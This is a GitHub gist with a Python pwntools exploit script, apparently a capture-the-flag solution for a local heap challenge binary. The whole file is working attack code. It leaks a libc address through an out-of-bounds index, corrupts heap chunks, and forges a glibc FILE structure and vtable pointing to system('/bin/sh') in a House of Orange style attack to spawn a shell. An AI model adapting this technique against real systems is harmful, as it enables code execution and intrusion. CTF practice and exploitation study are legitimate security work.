Created
August 8, 2020 14:49
-
-
Save Mech0n/2fb8be1392cb6312cbf00d5791e979cc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/python | |
| #-*- coding: utf-8 -*- | |
| from pwn import * | |
| context.terminal = ['tmux', 'splitw', '-h'] | |
| context(arch = 'amd64' , os = 'linux', log_level='debug') | |
| p = process('./pwn') | |
| libc = 0 | |
| IO_list_all = 0x3c5520 | |
| system = 0x0453a0 | |
| def pack_file_64(_flags = 0, | |
| _IO_read_ptr = 0, | |
| _IO_read_end = 0, | |
| _IO_read_base = 0, | |
| _IO_write_base = 0, | |
| _IO_write_ptr = 0, | |
| _IO_write_end = 0, | |
| _IO_buf_base = 0, | |
| _IO_buf_end = 0, | |
| _IO_save_base = 0, | |
| _IO_backup_base = 0, | |
| _IO_save_end = 0, | |
| _IO_marker = 0, | |
| _IO_chain = 0, | |
| _fileno = 0, | |
| _lock = 0, | |
| _mode = 0): | |
| struct = p64(_flags) + \ | |
| p64(_IO_read_ptr) + \ | |
| p64(_IO_read_end) + \ | |
| p64(_IO_read_base) + \ | |
| p64(_IO_write_base) + \ | |
| p64(_IO_write_ptr) + \ | |
| p64(_IO_write_end) + \ | |
| p64(_IO_buf_base) + \ | |
| p64(_IO_buf_end) + \ | |
| p64(_IO_save_base) + \ | |
| p64(_IO_backup_base) + \ | |
| p64(_IO_save_end) + \ | |
| p64(_IO_marker) + \ | |
| p64(_IO_chain) + \ | |
| p32(_fileno) | |
| struct = struct.ljust(0x88, "\x00") | |
| struct += p64(_lock) | |
| struct = struct.ljust(0xc0,"\x00") | |
| struct += p64(_mode) | |
| struct = struct.ljust(0xd8, "\x00") | |
| return struct | |
| def debug(p, cmd): | |
| gdb.attach(p, cmd) | |
| pause() | |
| def add(name, size, desc): | |
| p.sendlineafter('Input your choice:', '1') | |
| p.sendlineafter('Member name:', name) | |
| p.sendlineafter('Description size:', str(size)) | |
| p.sendafter('Description:', desc) | |
| def delete(idx): | |
| p.sendlineafter('Input your choice:', '2') | |
| p.sendlineafter('index:', str(idx)) | |
| def show(idx): | |
| p.sendlineafter('Input your choice:', '3') | |
| p.sendlineafter('index:', str(idx)) | |
| def LEAK(): | |
| # debug(p, 'b *$rebase(0xF38)\n') | |
| show(-5) | |
| # p.interactive() | |
| p.recvuntil('The name:') | |
| stdin = u64(p.recvuntil('\x7f').ljust(8, '\x00')) | |
| libc = stdin - 0x3c5710 | |
| success('stdin: ' + hex(stdin)) | |
| success('LIBC: ' + hex(libc)) | |
| return libc | |
| def Orange(): | |
| add('mech0n', 0x10, 'a\n') #idx :0 | |
| add('mech0n', 0x10, 'a\n') #idx :1 | |
| add('mech0n', 0x20, 'a\n') #idx :2 | |
| add('mech0n', 0x30, 'a\n') #idx :3 | |
| add('mech0n', 0x30, 'a\n') #idx :4 | |
| delete(1) | |
| delete(0) | |
| add('mech0n', 0, '\n') | |
| show(0) | |
| p.recvuntil('Description:') | |
| heap_addr = u64(p.recv(6).ljust(8, '\x00')) | |
| add('mech0n', 0, '\n') | |
| delete(0) | |
| payload = 'a' * 0x10 + p64(0) + p64(0x91) + '\n' | |
| add('mech0n', 0, payload) | |
| delete(1) | |
| # debug(p, 'b *$rebase(0xBAE)\n') | |
| delete(0) | |
| payload = 'a' * 0x10 | |
| payload += pack_file_64(_flags = u64('/bin/sh\0'), | |
| _IO_read_ptr = 0x61, | |
| _IO_read_end = 0, | |
| _IO_read_base = IO_list_all - 0x10, | |
| _IO_write_base = 2, | |
| _IO_write_ptr = 3) | |
| vtable = heap_addr + 0xe0 | |
| payload += p64(vtable) | |
| payload += p64(0)*2 + p64(system) + p64(system) | |
| add('mech0n', 0, payload + '\n') | |
| # debug(p, 'b *$rebase(0xBAE)\n') | |
| # p.interactive() | |
| p.sendlineafter('choice:','1') | |
| p.sendlineafter('name:','mech0n') | |
| p.sendlineafter('size:',str(0x20)) | |
| p.interactive() | |
| if __name__ == "__main__": | |
| libc = LEAK() | |
| IO_list_all = libc + IO_list_all | |
| system = libc + system | |
| Orange() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment